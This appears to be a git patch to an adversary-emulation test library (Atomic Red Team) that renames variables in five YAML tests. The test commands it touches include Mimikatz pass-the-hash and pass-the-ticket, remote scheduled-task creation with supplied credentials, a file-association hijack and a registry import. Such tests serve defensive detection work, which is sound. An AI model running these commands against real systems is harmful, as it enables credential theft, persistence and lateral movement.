From b2dda75932c03f993351938bfdfaaa19e856e24b Mon Sep 17 00:00:00 2001
From: Michael Haag
 <“mike@redcanary.com  git config --global user.name “Michael Haag>
Date: Fri, 31 Aug 2018 07:59:05 -0400
Subject: [PATCH] Technique fixes

Fixed techniques per Issue #317
---
 atomics/T1042/T1042.yaml | 2 +-
 atomics/T1053/T1053.yaml | 3 ++-
 atomics/T1075/T1075.yaml | 6 +++---
 atomics/T1103/T1103.yaml | 2 +-
 atomics/T1124/T1124.yaml | 2 +-
 5 files changed, 8 insertions(+), 7 deletions(-)

diff --git a/atomics/T1042/T1042.yaml b/atomics/T1042/T1042.yaml
index 44a01f0f..540335f7 100644
--- a/atomics/T1042/T1042.yaml
+++ b/atomics/T1042/T1042.yaml
@@ -21,4 +21,4 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      cmd.exe assoc #{extension_to_change}="#{thing_to_execute}"
+      cmd.exe assoc #{extension_to_change}="#{target_exenstion_handler}"
diff --git a/atomics/T1053/T1053.yaml b/atomics/T1053/T1053.yaml
index 9484ef5a..e81a4c38 100644
--- a/atomics/T1053/T1053.yaml
+++ b/atomics/T1053/T1053.yaml
@@ -35,6 +35,7 @@ atomic_tests:
     name: command_prompt
     command: |
       SCHTASKS /Create /SC ONCE /TN spawn /TR #{task_command} /ST #{time}
+
 - name: Scheduled task Remote
   description: |
       Create a task on a remote system
@@ -65,4 +66,4 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      SCHTASKS /Create /S #{target} /RU #{UserName} /RP #{Password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
+      SCHTASKS /Create /S #{target} /RU #{user_name} /RP #{password} /TN "Atomic task" /TR "#{task_command}" /SC daily /ST #{time}
diff --git a/atomics/T1075/T1075.yaml b/atomics/T1075/T1075.yaml
index 8072ce72..0bdc358d 100644
--- a/atomics/T1075/T1075.yaml
+++ b/atomics/T1075/T1075.yaml
@@ -12,7 +12,7 @@ atomic_tests:
     - windows
 
   input_arguments:
-    user:
+    user_name:
       description: username
       type: string
       default: Administrator
@@ -28,7 +28,7 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      mimikatz # sekurlsa::pth /user:#{user} /domain:#{domain} /ntlm:#{ntlm}
+      mimikatz # sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}
 
 - name: Mimikatz Kerberos Ticket Attack
   description: |
@@ -40,4 +40,4 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      mimikatz # kerberos::ptt #{username}@#{Domain}
+      mimikatz # kerberos::ptt #{user_name}@#{domain}
diff --git a/atomics/T1103/T1103.yaml b/atomics/T1103/T1103.yaml
index d1c04cf0..72f636e7 100644
--- a/atomics/T1103/T1103.yaml
+++ b/atomics/T1103/T1103.yaml
@@ -18,4 +18,4 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      reg.exe import #{file_name}
+      reg.exe import #{registry_file}
diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml
index 4a68cbe3..aa35cae0 100644
--- a/atomics/T1124/T1124.yaml
+++ b/atomics/T1124/T1124.yaml
@@ -19,7 +19,7 @@ atomic_tests:
   executor:
     name: command_prompt
     command: |
-      net time \\#{computername}
+      net time \\#{computer_name}
       w32tm /tz
 
 - name: System Time Discovery - PowerShell